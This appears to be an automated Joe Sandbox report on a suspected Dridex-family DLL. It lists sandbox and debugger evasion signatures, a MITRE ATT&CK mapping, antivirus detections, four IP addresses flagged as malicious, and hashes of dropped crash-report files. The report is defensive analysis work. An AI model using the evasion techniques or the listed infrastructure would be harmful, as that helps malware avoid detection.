Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1585

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1585

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EF50730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6EF50730

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000006.00000003.286519944.0000000004E93000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.288128512.0000000004E93000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.288224808.0000000004F53000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.283966767.0000000004F53000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.282460048.0000000004F53000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EF46D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6EF46D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EF53138 RtlAddVectoredExceptionHandler,

0_2_6EF53138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.774080275.0000000001650000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.258830765.0000000002FD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.255707533.0000000002FD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.774080275.0000000001650000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.258830765.0000000002FD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.255707533.0000000002FD0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.774080275.0000000001650000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.258830765.0000000002FD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.255707533.0000000002FD0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.774080275.0000000001650000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.258830765.0000000002FD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.255707533.0000000002FD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.774080275.0000000001650000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.258830765.0000000002FD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.255707533.0000000002FD0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6EF46D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6EF46D0C

Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery31	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
triage_dropped_file.dll	20%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.rundll32.exe.6ef40000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.6ef40000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.6ef40000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.2.rundll32.exe.2a50000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.2a50000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.1070000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.rundll32.exe.6ef40000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.2a50000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.casavalduga.com.brDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://www.casavalduga.com.brDVarFileInfo$	loaddll32.exe, 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.259160782.000000006EF5F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544204
Start date:	22.12.2021
Start time:	20:37:57
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	triage_dropped_file (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 95.8% (good quality ratio 94.1%) Quality average: 79.8% Quality standard deviation: 24.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 131.253.33.200, 13.107.22.200, 104.208.16.94 Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
20:39:15	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
85.10.248.28	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
ARUBA-ASNIT	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	80.211.3.13
	yXVganwQXW.dll	Get hash	malicious	Browse	212.237.56.116
	KT9GKWEcbY.dll	Get hash	malicious	Browse	212.237.56.116
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	80.211.3.13
	triage_dropped_file.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	80.211.3.13
	BOcrV5kVX1.dll	Get hash	malicious	Browse	212.237.56.116
	Y42bdCh1Yp.dll	Get hash	malicious	Browse	212.237.56.116
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	80.211.3.13
	Positive_Result_75184731.xls	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	80.211.3.13
HETZNER-ASDE	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_cc4833c459082f64bb58ca15f175bf504d1df1_82810a17_19424207\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9151102439797452
Encrypted:	false
SSDEEP:	192:RToAiv0oXddHBUZMX4jed+JT/u7sqS274ItWc:13iRXPBUZMX4jew/u7sqX4ItWc
MD5:	B85CFC21BD9C8AC27282C6D196FD03E3
SHA1:	F5D04CF9F97779B079068F883E1CAD5957CA81E4
SHA-256:	0334CCF6193B794C273348A038903F19785F64C63F8D27FA6C7C9E7536A7F747
SHA-512:	379172139C5076421CC733E1F8C24235B3B20F737E2DC0760291855EA30CDAF22BAE87DBB19277F156A77C2D059AB2B75C92002793B0E8301DD24E9DC1B5197A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.0.7.9.4.6.6.5.5.0.5.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.0.7.9.5.2.3.5.8.1.7.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.4.f.4.5.7.c.-.6.7.6.2.-.4.1.1.a.-.8.e.e.3.-.a.c.c.d.8.3.8.c.9.d.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.a.b.6.8.8.6.-.5.c.a.e.-.4.c.6.1.-.8.2.0.0.-.3.e.2.0.1.0.d.a.e.a.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.8.8.-.0.0.0.1.-.0.0.1.6.-.b.8.c.b.-.1.d.0.1.b.7.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2160.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 23 04:39:08 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	44130
Entropy (8bit):	2.15474197816003
Encrypted:	false
SSDEEP:	192:yPmx/mLGmWBO5SkbmnPmi7CjjJFV4zhpcMR8caqfnYrH:HIC05LbwPmi7yFCzhpcMPMH
MD5:	D24C97003DC518892702DD2BA5ECF272
SHA1:	6E5C4A2F3EAD87CB4148D06277FA98A0657D418B
SHA-256:	FC4E0DEA77FD81BFCAB387C4AFB365B6693DD95203FC7994304B5843489CDA3D
SHA-512:	C61B2D5415A70CF01694C8D842B466C214021D87A0DE2C7589AE10FA8F88FA59F742E74D587A7E89AB4D9CBF1A0AC298226618E3EC9B5EA142AD920DCFBFBC61
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......l..a.........................................-..........T.......8...........T...........@..."............................................................................................U...........B...... .......GenuineIntelW...........T...........d..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2808.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8274
Entropy (8bit):	3.688964625308133
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNinH67zh3Mx6Y6E6ZgmfT+aS0Cprj89b/ysf0pU1m:RrlsNiH6J3K6YJ6ZgmfTrSI/xfQb
MD5:	238146899629AE4AC14A9450607A7E85
SHA1:	C3EE66D9611E1E2787C7BC59C3E0F4690EDFA036
SHA-256:	1703C785B3846112B433F79F9D4DDC56D8225A13B0342EF9BCCDE47D6869F4E1
SHA-512:	2B2EF6E6CB38914E053392E1EE1FFF44BF8F6F63F61725484DEA7B3DA268D87F02E6B5110FEB25D7B39A36EDF86FCF9E3634D7D94CE6CBD7EED6DA4D86BDD63B
Malicious:	false
Reputation:	low
